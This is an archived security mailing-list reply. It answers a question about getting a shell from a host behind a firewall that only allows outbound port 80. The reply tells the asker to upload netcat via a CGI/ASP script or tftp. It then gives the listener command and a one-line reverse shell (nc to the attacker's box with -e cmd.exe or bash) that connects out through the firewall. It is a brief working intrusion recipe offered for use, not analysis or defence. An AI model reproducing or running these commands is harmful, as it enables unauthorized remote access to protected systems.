Re: Server initiated remote shell

[Bill Pennington <billp () boarder org>]

You want netcat, you can find in on packetstorm.

What you will need to do first is build an CGI/ASP script to upload your
code, assuming you can't just tftp it from the internal system.

Then on your box execute:

nc -l -p 80

On the remote server execute

nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or
whatever command interpeter is handy. You will then see a command prompt
appear on your local box.

Sounds like the hard part will be getting netcat on the box. Good luck!

Ilici Ramirez wrote:
> Hi,
>
> Lets suppose that I can execute a program on an inside
> host on a network protected by a firewall. There is no
> way in. But there is a way out to www browsing on port
> 80.
>
> So the client could connect to any Internet address on
> port 80. What program should it execute to provide me
> with a shell? Of course I'm in Internet with a
> listener. What listener?
>
> The firewall is a real statefull firewall so no TCP
> ACK or ICMP encapsulations.
>
> Have a nice weekend too.
>
> Ilici R
>
> __________________________________________________
> Terrorist Attacks on U.S. - How can you help?
> Donate cash, emergency relief information
> http://dailynews.yahoo.com/fc/US/Emergency_Information/
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please see:
> https://alerts.securityfocus.com/

-- 


Bill Pennington - CISSP

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/